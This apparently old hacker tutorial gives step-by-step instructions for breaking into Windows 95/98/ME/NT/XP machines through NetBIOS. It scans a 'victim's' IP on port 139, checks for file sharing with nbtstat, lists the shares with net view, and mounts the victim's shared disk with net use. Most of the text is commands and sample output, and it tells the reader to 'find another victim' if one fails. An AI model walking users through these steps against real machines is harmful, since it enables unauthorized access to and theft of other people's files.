netbios hacking for windows 95/98/me/nt/xp
more info about netbios here
step 1
get a ip (range) scanner. (superscanner is a fast one, get it here).
scan the victim's ip on tcp/ip port 139 (more info about tcp/ip port here)
step 2
open a dos prompt
do this by going to start/run
enter [Link] and press ok
this is what you see:
c:\windows>
this is what you need to type down:
replace [Link] with the victims ip address.
c:\windows>nbtstat -a [Link]
if you see this your in:
netbios remote machine name tablename type status
---------------------------------------------------------------
user<00> unique registered
workgroup <00> group registered
user <03> unique registered
user <20> unique registered
mac address = xx-xx-xx-xx-xx-xx
---------------------------------------------------------------
if you don't get the number <20>.
the victim disabled the file and printer sharing, find a another victim.
step 3
type down:
c:\windows>net view \\[Link]
if the output is like this:
shared resources at \\[Link]
computernamegoeshere
sharename type used as comment
------------------------------------------------------------
cdisk disk xxxxx xxxxx
the command completed successfully.
"disk" shows that the victim is sharing a disk named as cdisk
step 4
type down:
you can replace x: by anything letter yopu want but not your own drive letters.
cdisk is the name of the shared harddrive.
c:\windows>net use x: \\[Link]\cdisk
if the command is successful we will get the confirmation.
the command was completed successfullly
now open windows explorer or just double click on the my computer icon on your
desktop and you will see a new network drive x:\> . now your are a small time
hacker.
good luck.
2tales a.k.a firehand ([Link] crew)